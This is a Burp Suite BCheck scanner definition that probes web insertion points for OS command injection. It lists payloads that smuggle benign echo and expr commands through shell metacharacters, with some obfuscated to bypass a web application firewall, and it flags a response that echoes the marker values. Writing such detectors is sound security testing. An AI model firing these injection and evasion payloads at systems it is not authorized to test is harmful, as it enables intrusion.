metadata:
    language: v2-beta
    name: "OS Command Injection - Multi Vector with WAF Bypass"
    description: "Tests for OS command injection using multiple shell metacharacters and obfuscation"
    author: "BCheck Arsenal"
    tags: "cmdi", "rce", "waf-bypass"

run for each:
    payload = "|echo 884729",
        ";echo 884729",
        "`echo 884729`",
        "$(echo 884729)",
        "%0aecho 884729",
        ";%09echo 884729",
        ";e${IFS}cho 884729",
        ";{echo,884729}",
        "|expr 444 \* 666",
        ";expr 444 \* 666",
        "`expr 444 \* 666`",
        "$(expr 444 \* 666)",
        "||echo 884729",
        "&&echo 884729"

given insertion point then
    send payload:
        replacing: {payload}

    if not({latest.response.status_code} is "400") then
        if {latest.response} matches "(884729|295704)" then
            report issue:
                severity: high
                confidence: certain
                detail: "OS command injection detected. The application executes user-supplied input as system commands."
                remediation: "Never pass user input to system commands. Use language-native APIs."
        end if
    end if